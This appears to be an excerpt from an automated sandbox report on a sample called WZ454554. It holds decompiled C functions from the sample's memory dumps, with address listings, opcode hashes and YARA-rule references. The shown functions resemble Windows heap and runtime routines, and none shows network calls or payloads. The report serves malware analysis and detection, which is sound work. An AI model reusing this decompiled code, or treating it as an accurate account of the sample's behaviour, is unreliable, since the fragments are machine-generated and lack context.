						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							L00ACFFB0(_t77, _t114, _t114);
						}
						_t63 = L00B82FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E00AD2280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}




















                            0x00b822b9
                            0x00b822c2
                            0x00b822c6
                            0x00b822c8
                            0x00b822d8
                            0x00b822e2
                            0x00b82303
                            0x00b82314
                            0x00b82321
                            0x00b8234a
                            0x00b8235b
                            0x00b8236c
                            0x00b82372
                            0x00b82376
                            0x00b8238f
                            0x00b8238f
                            0x00b823b4
                            0x00b823c6
                            0x00b823c9
                            0x00b823cc
                            0x00b823cf
                            0x00b823cf
                            0x00b823e9
                            0x00b823ee
                            0x00b823f8
                            0x00b823fb
                            0x00b823fb
                            0x00b82403
                            0x00b8240a
                            0x00b82378
                            0x00b8237b
                            0x00b82381
                            0x00b82385
                            0x00b82385
                            0x00b8238d
                            0x00000000
                            0x00000000
                            0x00b8238d
                            0x00b82376
                            0x00b82417

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 83269bae319198f396c2c4891c19d55fa0b9f7f4ac3aaa7306b87295f3a239aa
                            • Instruction ID: 285368b7d6f8daca44c732a36ac5d182efed9d85936706b749f44611ff48d7a5
                            • Opcode Fuzzy Hash: 83269bae319198f396c2c4891c19d55fa0b9f7f4ac3aaa7306b87295f3a239aa
                            • Instruction Fuzzy Hash: 754116712043514FD708DF29C8A1A7ABBE1EF95325F05469EF5D68B2D2CB34D809C7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B820A8, Relevance: .1, Instructions: 114COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E00B820A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0xba6110; // 0x2f755769
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0xba6110; // 0x2f755769
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						L00B82E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0xba6110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						L00B82E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0xba6110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							L00B82E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0xba6110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0xba6110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}





















                            0x00b820a8
                            0x00b820b0
                            0x00b820b6
                            0x00b820ba
                            0x00b820be
                            0x00b820c4
                            0x00b820cb
                            0x00b820db
                            0x00b820e4
                            0x00b820e7
                            0x00b820e9
                            0x00b820ef
                            0x00b820f1
                            0x00b820fe
                            0x00b82102
                            0x00b82105
                            0x00b82105
                            0x00b82107
                            0x00b8210d
                            0x00b82112
                            0x00b82115
                            0x00b82120
                            0x00b82120
                            0x00b82107
                            0x00b82126
                            0x00b82131
                            0x00b82133
                            0x00b8213e
                            0x00b8213e
                            0x00b82140
                            0x00b82146
                            0x00b8214b
                            0x00b82156
                            0x00b82156
                            0x00b82140
                            0x00b8215f
                            0x00b82165
                            0x00b82170
                            0x00b82172
                            0x00b8217d
                            0x00b8217d
                            0x00b8217f
                            0x00b82185
                            0x00b82192
                            0x00b82192
                            0x00b8217f
                            0x00b82170
                            0x00b82197
                            0x00b82199
                            0x00b821a1
                            0x00b821b1
                            0x00b821bf
                            0x00b821d6
                            0x00b821d6
                            0x00b821bf
                            0x00b821dd
                            0x00b821e5

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: abbea5c693141a36e105d4383780cba0ab441c5084ce6bc6090d40dad9efbbd2
                            • Instruction ID: 91246b256c0ba4e7440e78ec7f0d4ee5def290e7b3820b8370e34b5d5eea9863
                            • Opcode Fuzzy Hash: abbea5c693141a36e105d4383780cba0ab441c5084ce6bc6090d40dad9efbbd2
                            • Instruction Fuzzy Hash: AB418273E1002A8BCB18EF68C896579B7F1FB4930576641BED815BB2A1DB34AD41C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B7EA55, Relevance: .1, Instructions: 111COMMON
                            Download Yara Rule
                            C-Code - Quality: 70%
                            			E00B7EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E00AD2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E00B7E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E00ABF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						L00ACFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					L00B7AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					L00B7BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(L00AD7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						L00B6FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						L00ACFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E00B7A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                            0x00b7ea55
                            0x00b7ea66
                            0x00b7ea68
                            0x00b7ea6c
                            0x00b7ea6f
                            0x00b7ea72
                            0x00b7ea75
                            0x00b7ea7a
                            0x00b7ea7a
                            0x00b7ea7e
                            0x00b7ea80
                            0x00b7ea85
                            0x00b7ea8b
                            0x00b7eab5
                            0x00b7eabc
                            0x00b7eabf
                            0x00b7eabf
                            0x00b7eaca
                            0x00b7eace
                            0x00b7ead0
                            0x00b7eae4
                            0x00b7eaeb
                            0x00b7eaf0
                            0x00b7eaf5
                            0x00b7eb09
                            0x00b7eb0d
                            0x00b7eb1d
                            0x00b7eb2d
                            0x00b7eb38
                            0x00b7eb3d
                            0x00b7eb41
                            0x00b7eb4a
                            0x00b7eb60
                            0x00b7eb4c
                            0x00b7eb52
                            0x00b7eb59
                            0x00b7eb59
                            0x00b7eb68
                            0x00b7eb71
                            0x00b7eb71
                            0x00b7ea8d
                            0x00b7ea8f
                            0x00b7ea92
                            0x00b7ea97
                            0x00b7ea97
                            0x00b7ea9b
                            0x00b7ea9c
                            0x00b7ea9e
                            0x00b7eaa6
                            0x00b7eaa6
                            0x00b7eb7e

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                            • Instruction ID: 8bf2db3a1306b2839af54ea3c8e125b0d1e5103aaaadb7a76361896187ad6adb
                            • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                            • Instruction Fuzzy Hash: 9031A1726047059BC719DF24C981A6BB7EAFFC4310F0489AEF56A87741DA34E805CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B369A6, Relevance: .1, Instructions: 108COMMON
                            Download Yara Rule
                            C-Code - Quality: 69%
                            			E00B369A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0xbad360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L00AC6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E00B36BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E00AF9980() >= 0) {
							E00AD2280(_t56, 0xba8778);
							_t77 = 1;
							_t68 = 1;
							if( *0xba8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0xba8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(L00ABB6F0(0xa9c338, 0xa9c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									L00AF9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E00AF95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					L00ACFFB0(_t68, _t77, 0xba8778);
				}
				_pop(_t78);
				return L00AFB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                            0x00b369b5
                            0x00b369be
                            0x00b369c3
                            0x00b369c9
                            0x00b369cc
                            0x00b369d1
                            0x00b369d3
                            0x00b369de
                            0x00b369e1
                            0x00b369ea
                            0x00b369f6
                            0x00b369fe
                            0x00b36a13
                            0x00b36a14
                            0x00b36a15
                            0x00b36a16
                            0x00b36a1e
                            0x00b36a26
                            0x00b36a31
                            0x00b36a36
                            0x00b36a37
                            0x00b36a40
                            0x00b36a49
                            0x00b36a4a
                            0x00b36a53
                            0x00b36a59
                            0x00b36a5d
                            0x00b36a5e
                            0x00b36a64
                            0x00b36a67
                            0x00b36a6a
                            0x00b36a6d
                            0x00b36a70
                            0x00b36a77
                            0x00b36a7d
                            0x00b36a86
                            0x00b36a89
                            0x00b36a9c
                            0x00b36a9f
                            0x00b36aa2
                            0x00b36aa5
                            0x00b36aaf
                            0x00b36ab1
                            0x00b36ab8
                            0x00b36ab9
                            0x00b36abb
                            0x00b36abe
                            0x00b36ac5
                            0x00b36ac5
                            0x00b36aaf
                            0x00b36a40
                            0x00b36a26
                            0x00b369fe
                            0x00b36ace
                            0x00b36ad0
                            0x00b36ad3
                            0x00b36ad8
                            0x00b36adf
                            0x00b36adf
                            0x00b36ae8
                            0x00b36aef
                            0x00b36aef
                            0x00b36af9
                            0x00b36b06

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b30c2c3b85749e401320a04c481ff2889808c1d2a61ba61ff84de6e7c44b76cc
                            • Instruction ID: 3e5218df346e0e371d2456055a31a900260e236548d27443276dc33f4a1a57bc
                            • Opcode Fuzzy Hash: b30c2c3b85749e401320a04c481ff2889808c1d2a61ba61ff84de6e7c44b76cc
                            • Instruction Fuzzy Hash: 1B4167B1D00208AFDB24DFA5D941BFEBBF8EF48714F24856AE914A7261EB709905CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401030, Relevance: .1, Instructions: 108COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                            • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                            • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                            • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AB5210, Relevance: .1, Instructions: 107COMMON
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E00AB5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E00AB52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00AF95D0();
							L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						L00ACEB70(_t54, 0xba79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E00AF95D0();
								L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							L00ACEB70(_t54, 0xba79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E00AFF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						L00ACEB70(_t54, 0xba79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00AF95D0();
							L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                            0x00ab5220
                            0x00ab5224
                            0x00b10d13
                            0x00b10d16
                            0x00b10d19
                            0x00ab522a
                            0x00ab522a
                            0x00ab522d
                            0x00ab522d
                            0x00ab5231
                            0x00ab5235
                            0x00ab5239
                            0x00b10d5c
                            0x00b10d62
                            0x00000000
                            0x00000000
                            0x00b10d6a
                            0x00b10d7b
                            0x00b10d7f
                            0x00b10d81
                            0x00b10d84
                            0x00b10d95
                            0x00b10d95
                            0x00b10d6c
                            0x00b10d71
                            0x00b10d71
                            0x00b10d9a
                            0x00000000
                            0x00ab524a
                            0x00ab524a
                            0x00ab5250
                            0x00b10d24
                            0x00b10d35
                            0x00b10d39
                            0x00b10d3b
                            0x00b10d3e
                            0x00b10d50
                            0x00b10d50
                            0x00b10d26
                            0x00b10d2b
                            0x00b10d2b
                            0x00000000
                            0x00b10d55
                            0x00ab5256
                            0x00ab525b
                            0x00ab5265
                            0x00b10da7
                            0x00ab526b
                            0x00ab526e
                            0x00ab5272
                            0x00b10db1
                            0x00b10db4
                            0x00b10dc5
                            0x00b10dc5
                            0x00ab5272
                            0x00ab5278
                            0x00ab527e
                            0x00ab528a
                            0x00ab528c
                            0x00ab528d
                            0x00000000
                            0x00ab5280
                            0x00ab5282
                            0x00ab5288
                            0x00ab529f
                            0x00ab5292
                            0x00000000
                            0x00ab5292
                            0x00000000
                            0x00ab5288
                            0x00ab527e

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c8a8eae4e1c23736a4d5606fab87ecc01de1d9d43e3852de35dd45168ab3404d
                            • Instruction ID: c89d3ec8aaf155564eda0ddea2f681bf193c9c6259820283b9734679208cb3d9
                            • Opcode Fuzzy Hash: c8a8eae4e1c23736a4d5606fab87ecc01de1d9d43e3852de35dd45168ab3404d
                            • Instruction Fuzzy Hash: 52311831655A00EBC726AB64D981FF677B9FF10720F51466AF8154B1A2DB70EC80C690
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B37016, Relevance: .1, Instructions: 104COMMON
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E00B37016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0xbad360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							L00B36B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								L00B36B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(L00AD7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E00AF9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return L00AFB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L00AD4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                            0x00b37016
                            0x00b3701e
                            0x00b3702b
                            0x00b37033
                            0x00b37037
                            0x00b3703c
                            0x00b3703e
                            0x00b37041
                            0x00b37045
                            0x00b3704a
                            0x00b37050
                            0x00b37055
                            0x00b3705a
                            0x00b37062
                            0x00b37062
                            0x00b3705a
                            0x00b37064
                            0x00b37064
                            0x00b37067
                            0x00b37071
                            0x00b37096
                            0x00b3709b
                            0x00b370a2
                            0x00b370a6
                            0x00b370a7
                            0x00b370ad
                            0x00b370b3
                            0x00b370b6
                            0x00b370bb
                            0x00b370c3
                            0x00b370c3
                            0x00b370c6
                            0x00b370cd
                            0x00b370dd
                            0x00b370e0
                            0x00b370e2
                            0x00b370e2
                            0x00b370ee
                            0x00b37101
                            0x00b370f0
                            0x00b370f9
                            0x00b370f9
                            0x00b3710a
                            0x00b3710e
                            0x00b37112
                            0x00b37117
                            0x00b37118
                            0x00b37118
                            0x00b370bb
                            0x00b3711d
                            0x00b37123
                            0x00b37131
                            0x00b37131
                            0x00b37136
                            0x00b3713d
                            0x00b3713e
                            0x00b3713f
                            0x00b3714a
                            0x00b3714a
                            0x00b37084
                            0x00b37088
                            0x00000000
                            0x00b3708e
                            0x00b3708e
                            0x00b37092
                            0x00000000
                            0x00b37092

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 527aaa7e1c36e0565a260052beb6fa3775b6bb0add08f00f066f8beac45d7b11
                            • Instruction ID: ef92ff8ba8d82b228f7c040f340ee5fcaf8fca98934acadb8a60b9796d436875
                            • Opcode Fuzzy Hash: 527aaa7e1c36e0565a260052beb6fa3775b6bb0add08f00f066f8beac45d7b11
                            • Instruction Fuzzy Hash: 1A31E4B26087419BC324DF28C941A6BB3E5FF88700F144A69F89597791EB30ED04CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADC182, Relevance: .1, Instructions: 104COMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E00ADC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(L00AD7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = L00B88D34(_v8, _t80);
					}
					E00AD2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						L00ACFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E00B88833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						L00ACFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E00AFB180();
						if(_a4 != 0) {
							E00AD2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						L00ADBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						L00ADBB2D(_t16, _t15);
						E00ADB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						L00ACFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							L00ACFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					L00ACFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                            0x00adc18d
                            0x00adc18f
                            0x00adc191
                            0x00adc19b
                            0x00adc1a0
                            0x00adc1d4
                            0x00adc1de
                            0x00b22d6e
                            0x00adc1e4
                            0x00adc1e4
                            0x00adc1e4
                            0x00adc1ec
                            0x00b22d7d
                            0x00b22d7d
                            0x00adc1f3
                            0x00adc1ff
                            0x00b22d88
                            0x00b22d8d
                            0x00b22d94
                            0x00b22d94
                            0x00b22d9f
                            0x00b22da4
                            0x00b22dab
                            0x00b22db0
                            0x00b22db2
                            0x00b22db3
                            0x00b22db4
                            0x00b22dbc
                            0x00b22dc3
                            0x00b22dc3
                            0x00adc205
                            0x00adc205
                            0x00adc208
                            0x00adc20e
                            0x00adc211
                            0x00adc216
                            0x00adc219
                            0x00adc21f
                            0x00adc222
